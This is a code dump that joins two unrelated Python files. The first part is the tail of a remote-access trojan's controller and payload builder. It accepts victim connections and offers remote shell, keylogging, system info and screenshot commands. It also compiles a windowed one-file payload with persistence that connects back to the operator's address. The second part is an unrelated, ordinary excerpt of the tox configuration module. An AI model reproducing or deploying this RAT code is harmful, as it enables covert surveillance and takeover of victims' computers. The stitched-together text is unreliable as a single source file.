sys.stdout.write("\n")
print(tabulate.tabulate(lister, headers=headers))
sys.stdout.write("\n")
def c_shell(self):
result = ""
if self.CURRENT:
sys.stdout.write("\n")
while True:
val = input("# ")
val = "shell:" + val.rstrip(" ").lstrip(" ")
if val:
if val != "shell:exit":
self.CURRENT[1].send_data(val)
result = self.CURRENT[1].recv_data()
if result.strip(" "):
print(result)
else:
break
else:
sys.stdout.write("\n")
pull.error("You need to connect before execute this command!")
sys.stdout.write("\n")
def c_clear(self):
subprocess.call(["clear"], shell=True)
def c_keylogger(self, args):
if self.CURRENT:
if len(args) == 2:
if args[1] == "status":
return
elif args[1] == "on":
self.CURRENT[1].send_data("keylogger:on")
result = self.CURRENT[1].recv_data()
if result.strip(" "):
print(result)
elif args[1] == "off":
self.CURRENT[1].send_data("keylogger:off")
result = self.CURRENT[1].recv_data()
if result.strip(" "):
print(result)
elif args[1] == "dump":
self.CURRENT[1].send_data("keylogger:dump")
result = self.CURRENT[1].recv_data()
dirname = os.path.dirname(__file__)
dirname = os.path.join( dirname, 'keylogs' )
if not os.path.isdir(dirname):
os.mkdir(dirname)
dirname = os.path.join( dirname, '%s' % (self.CURRENT[1].ip) )
if not os.path.isdir(dirname):
os.mkdir(dirname)
fullpath = os.path.join( dirname, datetime.now().strftime("%d-%m-%Y %H:%M:%S.txt") )
fl = open( fullpath, 'w' )
fl.write( result )
fl.close()
pull.print("Dumped: [" + pull.GREEN + fullpath + pull.END + "]")
else:
pull.error("Invalid Syntax!")
else:
pull.error("Invalid Syntax!")
else:
pull.error("You need to connect before execute this command!")
def c_sysinfo(self):
if self.CURRENT:
self.CURRENT[1].send_data("sysinfo:")
result = self.CURRENT[1].recv_data()
if result.strip(" "):
print(result)
else:
pull.error("You need to connect before execute this command!")
def c_screenshot(self):
if self.CURRENT:
self.CURRENT[1].send_data("screenshot:")
result = self.CURRENT[1].recv_data()
dirname = os.path.dirname(__file__)
dirname = os.path.join( dirname, 'screenshots' )
if not os.path.isdir(dirname):
os.mkdir(dirname)
dirname = os.path.join( dirname, '%s' % (self.CURRENT[1].ip) )
if not os.path.isdir(dirname):
os.mkdir(dirname)
fullpath = os.path.join( dirname, datetime.now().strftime("%d-%m-%Y %H:%M:%S.png") )
fl = open( fullpath, 'wb' )
fl.write( result )
fl.close()
pull.print("Saved: [" + pull.DARKCYAN + fullpath + pull.END + "]")
else:
pull.error("You need to connect before execute this command!")
def c_exit(self):
sys.stdout.write("\n")
pull.exit("See Ya!\n")
class INTERFACE(COMMCENTER):
SOCKET = None
RUNNER = True
def __init__(self, prs):
self.address = prs.address
self.port = prs.port
def bind(self):
self.SOCKET = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.SOCKET.bind((self.address, self.port))
pull.print("Successfuly Bind to %s%s:%i" % (
pull.RED,
self.address,
self.port,
))
except Exception as e:
pull.exit("Unable to bind to %s%s:%i" % (
pull.RED,
self.address,
self.port,
))
def accept_threads(self):
self.SOCKET.listen(10)
while self.RUNNER:
conn, addr = self.SOCKET.accept()
is_valid = True
self.COUNTER += 1
client = CLIENT(conn, addr)
client.engage()
self.CLIENTS.append(
(
self.COUNTER,
client
)
)
def accept(self):
t = threading.Thread(target=self.accept_threads)
t.daemon = True
t.start()
#### Commands ####
def execute(self, vals):
if vals:
if vals[0] == "exit":
self.c_exit()
elif vals[0] == "help":
self.c_help(vals)
elif vals[0] == "sessions":
self.c_sessions()
elif vals[0] == "ping":
self.c_ping(vals)
elif vals[0] == "connect":
self.c_connect(vals)
elif vals[0] == "disconnect":
self.c_disconnect()
elif vals[0] == "shell":
self.c_shell()
elif vals[0] == "clear":
self.c_clear()
elif vals[0] == "keylogger":
self.c_keylogger(vals)
elif vals[0] == "sysinfo":
self.c_sysinfo()
elif vals[0] == "screenshot":
self.c_screenshot()
def launch(self):
pull.print("Launching Interface! Enter 'help' to get avaible commands! \n")
while True:
val = pull.get_com(self.CURRENT)
self.execute(val.split(" "))
def close(self):
self.SOCKET.close()
class GENERATOR:
data = ""
flname = ""
def __init__(self, prs):
self.address = prs.address
self.port = prs.port
self.source = prs.source
self.persistence = prs.persistence
self.output = self.get_output(prs.output)
self.pather = self.get_path()
self.v_imports = self.get_imports()
self.v_consts = self.get_consts()
self.v_persistence = self.get_persistence()
self.v_sysinfo = self.get_sysinfo()
self.v_screenshot = self.get_screenshot()
self.v_client = self.get_client()
self.v_main = self.get_main()
def get_output(self, out):
rtval = ""
if self.source:
if not out.endswith(".py"):
rtval = (out + ".py")
else:
rtval = out
else:
if platform.system() == "Windows":
if not out.endswith(".exe"):
rtval = (out + ".exe")
else:
rtval = out
elif platform.system() == "Linux":
rtval = (out)
else:
pull.exit("Unrecognized Platform")
return rtval
def get_path(self):
dirname = os.path.dirname(__file__)
dirname = os.path.join(dirname, 'mods')
if os.path.isdir(dirname):
return dirname
else:
pull.exit("Files missing to generate the payload!")
def get_imports(self):
topen = os.path.join(self.pather, 'imports.py')
fl = open(topen)
data = fl.read()
fl.close()
return data
def get_consts(self):
data = "CONSTIP = \"%s\"\nCONSTPT = %i" % (self.address, self.port)
return data
def get_persistence(self):
topen = os.path.join(self.pather, "persistence.py")
fl = open(topen)
data = fl.read()
fl.close()
return data
def get_sysinfo(self):
topen = os.path.join(self.pather, 'sysinfo.py')
fl = open(topen)
data = fl.read()
fl.close()
return data
def get_screenshot(self):
topen = os.path.join(self.pather, 'screenshot.py')
fl = open(topen)
data = fl.read()
fl.close()
return data
def get_client(self):
topen = os.path.join(self.pather, 'client.py')
fl = open(topen)
data = fl.read()
fl.close()
return data
def get_main(self):
topen = os.path.join(self.pather, 'main.py')
fl = open(topen)
data = fl.read()
fl.close()
return data
def tmp_dir(self):
dirname = os.path.dirname(__file__)
dirname = os.path.join(dirname, 'tmp')
if not os.path.isdir(dirname):
os.mkdir(dirname)
fname = os.path.join(dirname, 'cl.py')
return (dirname, fname, 'cl.py')
def patch(self):
time.sleep(2)
pull.function("Compiling modules ... ")
self.data = self.v_imports + "\n\n" + self.v_consts + "\n" + self.v_persistence + "\n" + self.v_sysinfo + "\n\n" + \
self.v_screenshot + "\n\n" + self.v_client + "\n\n" + self.v_main
time.sleep(2)
pull.function("Generating source code ...")
fl = open(self.output, 'w')
fl.write(self.data)
fl.close()
time.sleep(2)
pull.print("Code generated successfully!")
pull.print("File: " + self.output)
def generate(self):
time.sleep(2)
pull.function("Compiling modules ... ")
self.data = self.v_imports + "\n\n" + self.v_consts + "\n\n" + self.v_persistence + "\n\n" + self.v_sysinfo + "\n\n" + \
self.v_screenshot + "\n\n" + self.v_client + "\n\n" + self.v_main
time.sleep(2)
pull.function("Generating one time code for binary ")
self.flname = self.tmp_dir()
fl = open(self.flname[1], 'w')
fl.write(self.data)
fl.close()
pull.print("Code generated successfully!")
def compile(self):
pull.function("Compiling generated code /\\")
counter = 1
t = threading.Thread(target=PyInstaller.__main__.run, args=([
'--name=%s' % os.path.basename(self.output),
'--onefile',
'--windowed',
'--log-level=ERROR',
'--distpath=%s' % os.path.dirname(self.output),
'--workpath=%s' % self.flname[0],
os.path.join(self.flname[0], self.flname[2])
],),)
t.daemon = True
t.start()
while t.is_alive():
sys.stdout.write("\r" + pull.BLUE + "[" + pull.UNDERLINE + ":" + pull.END + pull.BLUE + "] " + pull.END + "Elapsed Time: %is" % (counter) + pull.END)
time.sleep(1)
counter += 1
sys.stdout.write("\n")
pull.print("Compiled Successfully!")
def clean(self):
pull.function("Cleaning files and temporary codes")
shutil.rmtree(self.flname[0])
pull.print("File: " + self.output)
class PARSER:
COMMANDS = ['bind', 'generate']
def __init__(self, prs):
self.mode = self.v_mode(prs.mode, prs.help)
self.help = self.v_help(prs.help)
if self.mode == "bind":
self.address = self.v_address(prs.address)
self.port = self.v_port(prs.port)
elif self.mode == "generate":
self.address = self.v_address(prs.address)
self.port = self.v_port(prs.port)
self.output = self.v_output(prs.output)
self.source = prs.source
self.persistence = prs.persistence
def v_help(self, hl):
if hl:
if not self.mode:
pull.help_overall()
else:
if self.mode == "bind":
pull.help_bind()
elif self.mode == "generate":
pull.help_generate()
else:
pull.help_help()
def v_address(self, str):
return str
def v_port(self, port):
if not port:
pull.exit("You need to Supply a Valid Port Number")
if port <= 0 or port > 65535:
pull.exit("Invalid Port Number")
return port
def v_mode(self, val, hl):
if val:
if val in self.COMMANDS:
return val
else:
pull.exit("No such command found in database")
else:
if not hl:
pull.exit("Invalid Syntax. Refer to the manual!")
def v_output(self, val):
if val:
if os.path.isdir(os.path.dirname(val)):
return val
else:
pull.exit("Directory doesn't exist!")
else:
pull.exit("You must provide an output Path!")
def main():
pull.logo()
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('mode', nargs="?", help="Moder")
parser.add_argument('-h', '--help' , dest="help" , default=False, action="store_true", help="Help Manual")
parser.add_argument('-a', '--address', dest="address", default="", type=str, help="Address to Bind to")
parser.add_argument('-p', '--port' , dest="port" , default=0 , type=int, help="Port to Bind to")
parser.add_argument('-o', '--output' , dest="output" , default="", type=str, help="Complete Path to Output File!")
parser.add_argument('-s', '--source' , dest="source" , default=False, action="store_true", help="Source file")
parser.add_argument('--persistence' , dest="persistence", default=False, action="store_true", help="Persistence")
parser = parser.parse_args()
parser = PARSER(parser)
if parser.mode == "bind":
iface = INTERFACE(parser)
iface.bind()
iface.accept()
iface.launch()
iface.close()
elif parser.mode == "generate":
pull.function("Starting Generator Mode!")
generator = GENERATOR(parser)
if generator.source:
generator.patch()
else:
generator.generate()
generator.compile()
generator.clean()
pull.function("Done")
if __name__ == "__main__":
main()
|
__init__.py
|
from __future__ import print_function
import argparse
import itertools
import os
import random
import re
import shlex
import string
import sys
import traceback
import warnings
from collections import OrderedDict
from fnmatch import fnmatchcase
from subprocess import list2cmdline
from threading import Thread
import pluggy
import py
import toml
from packaging import requirements
from packaging.utils import canonicalize_name
import tox
from tox.constants import INFO
from tox.exception import MissingDependency
from tox.interpreters import Interpreters, NoInterpreterInfo
from tox.reporter import (
REPORTER_TIMESTAMP_ON_ENV,
error,
update_default_reporter,
using,
verbosity1,
)
from tox.util.path import ensure_empty_dir
from tox.util.stdlib import importlib_metadata
from .parallel import ENV_VAR_KEY_PRIVATE as PARALLEL_ENV_VAR_KEY_PRIVATE
from .parallel import ENV_VAR_KEY_PUBLIC as PARALLEL_ENV_VAR_KEY_PUBLIC
from .parallel import add_parallel_config, add_parallel_flags
from .reporter import add_verbosity_commands
try:
from shlex import quote as shlex_quote
except ImportError:
from pipes import quote as shlex_quote
hookimpl = tox.hookimpl
# DEPRECATED - REMOVE - left for compatibility with plugins importing from here.
# Import hookimpl directly from tox instead.
WITHIN_PROVISION = os.environ.get(str("TOX_PROVISION")) == "1"
SUICIDE_TIMEOUT = 0.0
INTERRUPT_TIMEOUT = 0.3
TERMINATE_TIMEOUT = 0.2
_FACTOR_LINE_PATTERN = re.compile(r"^([\w{}\.!,-]+)\:\s+(.+)")
_ENVSTR_SPLIT_PATTERN = re.compile(r"((?:\{[^}]+\})+)|,")
_ENVSTR_EXPAND_PATTERN = re.compile(r"\{([^}]+)\}")
_WHITESPACE_PATTERN = re.compile(r"\s+")
def get_plugin_manager(plugins=()):
# initialize plugin manager
import tox.venv
pm = pluggy.PluginManager("tox")
pm.add_hookspecs(tox.hookspecs)
pm.register(tox.config)
pm.register(tox.interpreters)
pm.register(tox.venv)
pm.register(tox.session)
from tox import package
pm.register(package)
pm.load_setuptools_entrypoints("tox")
for plugin in plugins:
pm.register(plugin)
pm.check_pending()
return pm
class Parser:
"""Command line and ini-parser control object."""
def __init__(self):
class HelpFormatter(argparse.ArgumentDefaultsHelpFormatter):
def __init__(self, prog):
super(HelpFormatter, self).__init__(prog, max_help_position=35, width=190)
self.argparser = argparse.ArgumentParser(
description="tox options", add_help=False, prog="tox", formatter_class=HelpFormatter,
)
self._testenv_attr = []
def add_argument(self, *args, **kwargs):
""" add argument to command line parser. This takes the
same arguments that ``argparse.ArgumentParser.add_argument``.
"""
return self.argparser.add_argument(*args, **kwargs)
def add_testenv_attribute(self, name, type, help, default=None, postprocess=None):
""" add an ini-file variable for "testenv" section.
Types are specified as strings like "bool", "line-list", "string", "argv", "path",
"argvlist".
The ``postprocess`` function will be called for each testenv
like ``postprocess(testenv_config=testenv_config, value=value)``
where ``value`` is the value as read from the ini (or the default value)
and ``testenv_config`` is a :py:class:`tox.config.TestenvConfig` instance
which will receive all ini-variables as object attributes.
Any postprocess function must return a value which will then be set
as the final value in the testenv section.
"""
self._testenv_attr.append(VenvAttribute(name, type, default, help, postprocess))
def add_testenv_attribute_obj(self, obj):
""" add an ini-file variable as an object.
This works as the ``add_testenv_attribute`` function but expects
"name", "type", "help", and "postprocess" attributes on the object.
"""
assert hasattr(obj, "name")
assert hasattr(obj, "type")
assert hasattr(obj, "help")
assert hasattr(obj, "postprocess")
self._testenv_attr.append(obj)
def parse_cli(self, args, strict=False):
args, argv = self.argparser.parse_known_args(args)
if argv and (strict or WITHIN_PROVISION):
self.argparser.error("unrecognized arguments: {}".format(" ".join(argv)))
return args
def _format_help(self):
return self.argparser.format_help()
class VenvAttribute:
def __init__(self, name, type, default, help, postprocess):
self.name = name
self.type = type
self.default = default
self.help = help
self.postprocess = postprocess
class DepOption:
name = "deps"
type = "line-list"
help = "each line specifies a dependency in pip/setuptools format."
default = ()
def postprocess(self, testenv_config, value):
deps = []
config = testenv_config.config
for depline in value:
m = re.match(r":(\w+):\s*(\S+)", depline)
if m:
iname, name = m.groups()
ixserver = config.indexserver[iname]
else:
name = depline.strip()
ixserver = None
# we need to process options, in case they contain a space,
# as the subprocess call to pip install will otherwise fail.
# in case of a short option, we remove the space
for option in tox.PIP.INSTALL_SHORT_OPTIONS_ARGUMENT:
if name.startswith(option):
name = "{}{}".format(option, name[len(option) :].strip())
# in case of a long option, we add an equal sign
for option in tox.PIP.INSTALL_LONG_OPTIONS_ARGUMENT:
name_start = "{} ".format(option)
if name.startswith(name_start):
name = "{}={}".format(option, name[len(option) :].strip())
name = self._cut_off_dep_comment(name)
name = self._replace_forced_dep(name, config)
deps.append(DepConfig(name, ixserver))
return deps
def _replace_forced_dep(self, name, config):
"""Override given dependency config name. Take ``--force-dep-version`` option into account.
:param name: dep config, for example ["pkg==1.0", "other==2.0"].
:param config: ``Config`` instance
:return: the new dependency that should be used for virtual environments
"""
if not config.option.force_dep:
return name
for forced_dep in config.option.force_dep:
if self._is_same_dep(forced_dep, name):
return forced_dep
return name
@staticmethod
def _cut_off_dep_comment(name):
return re.sub(r"\s+#.*", "", name).strip()
@classmethod
def _is_same_dep(cls, dep1, dep2):
"""Definitions are the same if they refer to the same package, even if versions differ."""
dep1_name = canonicalize_name(requirements.Requirement(dep1).name)
try:
dep2_name = canonicalize_name(requirements.Requirement(dep2).name)
except requirements.InvalidRequirement:
# we couldn't parse a version, probably a URL
return False
return dep1_name == dep2_name
class PosargsOption:
name = "args_are_paths"
type = "bool"
default = True
help = "treat positional args in commands as paths"
def postprocess(self, testenv_config, value):
config = testenv_config.config
args = config.option.args
if args:
if value:
args = []
for arg in config.option.args:
if arg and not os.path.isabs(arg):
origpath = os.path.join(config.invocationcwd.strpath, arg)
if os.path.exists(origpath):
arg = os.path.relpath(origpath, testenv_config.changedir.strpath)
args.append(arg)
testenv_config._reader.addsubstitutions(args)
return value
class InstallcmdOption:
name = "install_command"
type = "argv"
default = "python -m pip install {opts} {packages}"
help = "install command for dependencies and package under test."
def postprocess(self, testenv_config, value):
if "{packages}" not in value:
raise tox.exception.ConfigError(
"'install_command' must contain '{packages}' substitution",
)
return value
def parseconfig(args, plugins=()):
"""Parse the configuration file and create a Config object.
:param plugins:
:param list[str] args: list of arguments.
:rtype: :class:`Config`
:raise SystemExit: toxinit file is not found
"""
pm = get_plugin_manager(plugins)
config, option = parse_cli(args, pm)
update_default_reporter(config.option.quiet_level, config.option.verbose_level)
for config_file in propose_configs(option.configfile):
config_type = config_file.basename
content = None
if config_type == "pyproject.toml":
toml_content = get_py_project_toml(config_file)
try:
content = toml_content["tool"]["tox"]["legacy_tox_ini"]
except KeyError:
continue
try:
ParseIni(config, config_file, content)
except SkipThisIni:
continue
pm.hook.tox_configure(config=config) # post process config object
break
else:
parser = Parser()
pm.hook.tox_addoption(parser=parser)
# if no tox config file, now we need do a strict argument evaluation
# raise on unknown args
parser.parse_cli(args, strict=True)
if option.help or option.helpini:
return config
if option.devenv:
# To load defaults, we parse an empty config
ParseIni(config, py.path.local(), "")
pm.hook.tox_configure(config=config)
return config
msg = "tox config file (either {}) not found"
candidates = ", ".join(INFO.CONFIG_CANDIDATES)
feedback(msg.format(candidates), sysexit=not (option.help or option.helpini))
return config
def get_py_project_toml(path):
with open(str(path)) as file_handler:
config_data = toml.load(file_handler)
return config_data
def propose_configs(cli_config_file):
from_folder = py.path.local()
if cli_config_file is not None:
if os.path.isfile(cli_config_file):
yield py.path.local(cli_config_file)
return
if os.path.isdir(cli_config_file):
from_folder = py.path.local(cli_config_file)
else:
print(
"ERROR: {} is neither file or directory".format(cli_config_file), file=sys.stderr,
)
return
for basename in INFO.CONFIG_CANDIDATES:
if from_folder.join(basename).isfile():
yield from_folder.join(basename)
for path in from_folder.parts(reverse=True):
ini_path = path.join(basename)
if ini_path.check():
yield ini_path
def parse_cli(args, pm):
parser = Parser()
pm.hook.tox_addoption(parser=parser)
option = parser.parse_cli(args)
if option.version:
print(get_version_info(pm))
raise SystemExit(0)
interpreters = Interpreters(hook=pm.hook)
config = Config(
pluginmanager=pm, option=option, interpreters=interpreters, parser=parser, args=args,
)
return config, option
def feedback(msg, sysexit=False):
print("ERROR: {}".format(msg), file=sys.stderr)
if sysexit:
raise SystemExit(1)
def get_version_info(pm):
out = ["{} imported from {}".format(tox.__version__, tox.__file__)]
plugin_dist_info = pm.list_plugin_distinfo()
if plugin_dist_info:
out.append("registered plugins:")
for mod, egg_info in plugin_dist_info:
source = getattr(mod, "__file__", repr(mod))
out.append(" {}-{} at {}".format(egg_info.project_name, egg_info.version, source))
return "\n".join(out)
class SetenvDict(object):
_DUMMY = object()
def __init__(self, definitions, reader):
self.definitions = definitions
self.reader = reader
self.resolved = {}
self._lookupstack = []
def __repr__(self):
return "{}: {}".format(self.__class__.__name__, self.definitions)
def __contains__(self, name):
return name in self.definitions
def get(self, name, default=None):
try:
return self.resolved[name]
except KeyError:
try:
if name in self._lookupstack:
raise KeyError(name)
val = self.definitions[name]
except KeyError:
return os.environ.get(name, default)
self._lookupstack.append(name)
try:
self.resolved[name] = res = self.reader._replace(val)
finally:
self._lookupstack.pop()
return res
def __getitem__(self, name):
x = self.get(name, self._DUMMY)
if x is self._DUMMY:
raise KeyError(name)
return x
def keys(self):
return self.definitions.keys()
def __setitem__(self, name, value):
self.definitions[name] = value
self.resolved[name] = value
@tox.hookimpl
def tox_addoption(parser):
parser.add_argument(
"--version", action="store_true", help="report version information to stdout.",
)
parser.add_argument("-h", "--help", action="store_true", help="show help about options")
parser.add_argument(
"--help-ini",
"--hi",
action="store_true",
dest="helpini",
help="show help about ini-names",
)
add_verbosity_commands(parser)
parser.add_argument(
"--showconfig",
action="store_true",
help="show live configuration (by default all env, with -l only default targets,"
" specific via TOXENV/-e)",
)
parser.add_argument(
"-l",
"--listenvs",
action="store_true",
help="show list of test environments (with description if verbose)",
)
parser.add_argument(
"-a",
"--listenvs-all",
action="store_true",
help="show list of all defined environments (with description if verbose)",
)
parser.add_argument(
"-c", dest="configfile", help="config file name or directory with 'tox.ini' file.",
)
parser.add_argument(
"-e",
action="append",
dest="env",
metavar="envlist",
help="work against specified environments (ALL selects all).",
)
parser.add_argument(
"--devenv",
metavar="ENVDIR",
help=(
"sets up a development environment at ENVDIR based on the env's tox "
"configuration specified by `-e` (-e defaults to py)."
),
)
parser.add_argument("--notest", action="store_true", help="skip invoking test commands.")
parser.add_argument(
"--sdistonly", action="store_true", help="only perform the sdist packaging activity.",
)
parser.add_argument(
"--skip-pkg-install", action="store_true", help="skip package installation for this run",
)
add_parallel_flags(parser)
parser.add_argument(
"--parallel--safe-build",
action="store_true",
dest="parallel_safe_build",
help="(deprecated) ensure two tox builds can run in parallel "
"(uses a lock file in the tox workdir with .lock extension)",
)
parser.add_argument(
"--installpkg",
metavar="PATH",
help="use specified package for installation into venv, instead of creating an sdist.",
)
parser.add_argument(
"--develop",
action="store_true",
help="install package in the venv using 'setup.py develop' via 'pip -e .'",
)
parser.add_argument(
"-i",
"--index-url",
action="append",
dest="indexurl",
metavar="URL",
help="set indexserver url (if URL is of form name=url set the "
"url for the 'name' indexserver, specifically)",
)
parser.add_argument(
"--pre",
action="store_true",
help="install pre-releases and development versions of dependencies. "
"This will pass the --pre option to install_command "
"(pip by default).",
)
parser.add_argument(
"-r", "--recreate", action="store_true", help="force recreation of virtual environments",
)
parser.add_argument(
"--result-json",
dest="resultjson",
metavar="PATH",
help="write a json file with detailed information "
"about all commands and results involved.",
)
parser.add_argument(
"--discover",
dest="discover",
nargs="+",
metavar="PATH",
help="for python discovery first try the python executables under these paths",
default=[],
)
# We choose 1 to 4294967295 because it is the range of PYTHONHASHSEED.
parser.add_argument(
"--hashseed",
metavar="SEED",
help="set PYTHONHASHSEED to SEED before running commands. "
"Defaults to a random integer in the range [1, 4294967295] "
"([1, 1024] on Windows). "
"Passing 'noset' suppresses this behavior.",
)
parser.add_argument(
"--force-dep",
action="append",
metavar="REQ",
help="Forces a certain version of one of the dependencies "
"when configuring the virtual environment. REQ Examples "
"'pytest<2.7' or 'django>=1.6'.",
)
parser.add_argument(
"--sitepackages",
action="store_true",
help="override sitepackages setting to True in all envs",
)
parser.add_argument(
"--alwayscopy",
action="store_true",
help="override alwayscopy setting to True in all envs",
)
cli_skip_missing_interpreter(parser)
parser.add_argument("--workdir", metavar="PATH", help="tox working directory")
parser.add_argument(
"args",
nargs="*",
help="additional arguments available to command positional substitution",
)
def _set_envdir_from_devenv(testenv_config, value):
if testenv_config.config.option.devenv is not None:
return py.path.local(testenv_config.config.option.devenv)
else:
return value
parser.add_testenv_attribute(
name="envdir",
type="path",
default="{toxworkdir}/{envname}",
help="set venv directory -- be very careful when changing this as tox "
"will remove this directory when recreating an environment",
postprocess=_set_envdir_from_devenv,
)
# add various core venv interpreter attributes
def setenv(testenv_config, value):
setenv = value
config = testenv_config.config
if "PYTHONHASHSEED" not in setenv and config.hashseed is not None:
setenv["PYTHONHASHSEED"] = config.hashseed
setenv["TOX_ENV_NAME"] = str(testenv_config.envname)
setenv["TOX_ENV_DIR"] = str(testenv_config.envdir)
return setenv
parser.add_testenv_attribute(
name="setenv",
type="dict_setenv",
postprocess=setenv,
help="list of X=Y lines with environment variable settings",
)
def basepython_default(testenv_config, value):
"""either user set or proposed from the factor name
in both cases we check that the factor name implied python version and the resolved
python interpreter version match up; if they don't we warn, unless ignore base
python conflict is set in which case the factor name implied version if forced
"""
for factor in testenv_config.factors:
match = tox.PYTHON.PY_FACTORS_RE.match(factor)
if match:
base_exe = {"py": "python"}.get(match.group(1), match.group(1))
version_s = match.group(2)
if not version_s:
version_info = ()
elif len(version_s) == 1:
version_info = (version_s,)
else:
version_info = (version_s[0], version_s[1:])
implied_version = ".".join(version_info)
implied_python = "{}{}".format(base_exe, implied_version)
break
else:
implied_python, version_info, implied_version = None, (), ""
if testenv_config.config.ignore_basepython_conflict and implied_python is not None:
return implied_python
proposed_python = (implied_python or sys.executable) if value is None else str(value)
if implied_python is not None and implied_python != proposed_python:
testenv_config.basepython = proposed_python
python_info_for_proposed = testenv_config.python_info
if not isinstance(python_info_for_proposed, NoInterpreterInfo):
proposed_version = ".".join(
str(x) for x in python_info_for_proposed.version_info[: len(version_info)]
)
if proposed_version != implied_version:
# TODO(stephenfin): Raise an exception here in tox 4.0
warnings.warn(
"conflicting basepython version (set {}, should be {}) for env '{}';"
"resolve conflict or set ignore_basepython_conflict".format(
proposed_version, implied_version, testenv_config.envname,
),
)
return proposed_python
parser.add_testenv_attribute(
name="basepython",
type="basepython",
default=None,
postprocess=basepython_default,
help="executable name or path of interpreter used to create a virtual test environment.",
)
def merge_description(testenv_config, value):
"""the reader by default joins generated description with new line,
replace new line with space"""
return value.replace("\n", " ")
parser.add_testenv_attribute(
name="description",
type="string",
default="",
postprocess=merge_description,
help="short description of this environment",
)
parser.add_testenv_attribute(
name="envtmpdir", type="path", default="{envdir}/tmp", help="venv temporary directory",
)
parser.add_testenv_attribute(
name="envlogdir", type="path", default="{envdir}/log", help="venv log directory",
)
parser.add_testenv_attribute(
name="downloadcache",
type="string",
default=None,
help="(ignored) has no effect anymore, pip-8 uses local caching by default",
)
parser.add_testenv_attribute(
name="changedir",
type="path",
default="{toxinidir}",
help="directory to change to when running commands",
)
parser.add_testenv_attribute_obj(PosargsOption())
def skip_install_default(testenv_config, value):
return value is True or testenv_config.config.option.skip_pkg_install is True
parser.add_testenv_attribute(
name="skip_install",
type="bool",
default=False,
postprocess=skip_install_default,
help="Do not install the current package. This can be used when you need the virtualenv "
"management but do not want to install the current package",
)
parser.add_testenv_attribute(
name="ignore_errors",
type="bool",
default=False,
help="if set to True all commands will be executed irrespective of their result error "
"status.",
)
def recreate(testenv_config, value):
if testenv_config.config.option.recreate:
return True
return value
parser.add_testenv_attribute(
name="recreate",
type="bool",
default=False,
postprocess=recreate,
help="always recreate this test environment.",
)
def passenv(testenv_config, value):
# Flatten the list to deal with space-separated values.
value = list(itertools.chain.from_iterable([x.split(" ") for x in value]))
passenv = {
"CURL_CA_BUNDLE",
"LANG",
"LANGUAGE",
"LD_LIBRARY_PATH",
"PATH",
"PIP_INDEX_URL",
"PIP_EXTRA_INDEX_URL",
"REQUESTS_CA_BUNDLE",
"SSL_CERT_FILE",
"TOX_WORK_DIR",
"HTTP_PROXY",
"HTTPS_PROXY",
"NO_PROXY",
str(REPORTER_TIMESTAMP_ON_ENV),
str(PARALLEL_ENV_VAR_KEY_PUBLIC),
}
# read in global passenv settings
p = os.environ.get("TOX_TESTENV_PASSENV", None)
if p is not None:
env_values = [x for x in p.split() if x]
value.extend(env_values)
# we ensure that tmp directory settings are passed on
# we could also set it to the per-venv "envtmpdir"
# but this leads to very long paths when run with jenkins
# so we just pass it on by default for now.
if tox.INFO.IS_WIN:
passenv.add("SYSTEMDRIVE") # needed for pip6
passenv.add("SYSTEMROOT") # needed for python's crypto module
passenv.add("PATHEXT") # needed for discovering executables
passenv.add("COMSPEC") # needed for distutils cygwincompiler
passenv.add("TEMP")
passenv.add("TMP")
# for `multiprocessing.cpu_count()` on Windows (prior to Python 3.4).
passenv.add("NUMBER_OF_PROCESSORS")
passenv.add("PROCESSOR_ARCHITECTURE") # platform.machine()
passenv.add("USERPROFILE") # needed for `os.path.expanduser()`
passenv.add("MSYSTEM") # fixes #429
else:
passenv.add("TMPDIR")
for spec in value:
for name in os.environ:
if fnmatchcase(name.upper(), spec.upper()):
passenv.add(name)
return passenv
parser.add_testenv_attribute(
name="passenv",
type="line-list",
postprocess=passenv,
help="environment variables needed during executing test commands (taken from invocation "
"environment). Note that tox always passes through some basic environment variables "
"which are needed for basic functioning of the Python system. See --showconfig for the "
"eventual passenv setting.",
)
parser.add_testenv_attribute(
name="whitelist_externals", type="line-list", help="DEPRECATED: use allowlist_externals",
)
parser.add_testenv_attribute(
name="allowlist_externals",
type="line-list",
help="each lines specifies a path or basename for which tox will not warn "
"about it coming from outside the test environment.",
)
parser.add_testenv_attribute(
name="platform",
type="string",
default=".*",
help="regular expression which must match against ``sys.platform``. "
"otherwise testenv will be skipped.",
)
def sitepackages(testenv_config, value):
return testenv_config.config.option.sitepackages or value
def alwayscopy(testenv_config, value):
return testenv_config.config.option.alwayscopy or value
parser.add_testenv_attribute(
name="sitepackages",
type="bool",
default=False,
postprocess=sitepackages,
help="Set to ``True`` if you want to create virtual environments that also "
"have access to globally installed packages.",
)
parser.add_testenv_attribute(
"download",
type="bool",
default=False,
help="download the latest pip, setuptools and wheel when creating the virtual"
"environment (default is to use the one bundled in virtualenv)",
)
parser.add_testenv_attribute(
name="alwayscopy",
type="bool",
default=False,
postprocess=alwayscopy,
help="Set to ``True`` if you want virtualenv to always copy files rather "
"than symlinking.",
)
def pip_pre(testenv_config, value):
return testenv_config.config.option.pre or value
parser.add_testenv_attribute(
name="pip_pre",
type="bool",
default=False,
postprocess=pip_pre,
help="If ``True``, adds ``--pre`` to the ``opts`` passed to the install command. ",
)
def develop(testenv_config, value):
option = testenv_config.config.option
return not option.installpkg and (value or option.develop or option.devenv is not None)
parser.add_testenv_attribute(
name="usedevelop",
type="bool",
postprocess=develop,
default=False,
help="install package in develop/editable mode",
)
parser.add_testenv_attribute_obj(InstallcmdOption())
parser.add_testenv_attribute(
name="list_dependencies_command",
type="argv",
default="python -m pip freeze",
help="list dependencies for a virtual environment",
)
parser.add_testenv_attribute_obj(DepOption())
parser.add_testenv_attribute(
name="suicide_timeout",
type="float",
default=SUICIDE_TIMEOUT,
help="timeout to allow process to exit before sending SIGINT",
)
parser.add_testenv_attribute(
name="interrupt_timeout",
type="float",
default=INTERRUPT_TIMEOUT,
help="timeout before sending SIGTERM after SIGINT",
)
parser.add_testenv_attribute(
name="terminate_timeout",
type="float",
default=TERMINATE_TIMEOUT,
help="timeout before sending SIGKILL after SIGTERM",
)
parser.add_testenv_attribute(
name="commands",
type="argvlist",
default="",
help="each line specifies a test command and can use substitution.",
)
parser.add_testenv_attribute(
name="commands_pre",
type="argvlist",
default="",
help="each line specifies a setup command action and can use substitution.",
)
parser.add_testenv_attribute(
name="commands_post",
type="argvlist",
default="",
help="each line specifies a teardown command and can use substitution.",
)
parser.add_testenv_attribute(
"ignore_outcome",
type="bool",
default=False,
help="if set to True a failing result of this testenv will not make "
"tox fail, only a warning will be produced",
)
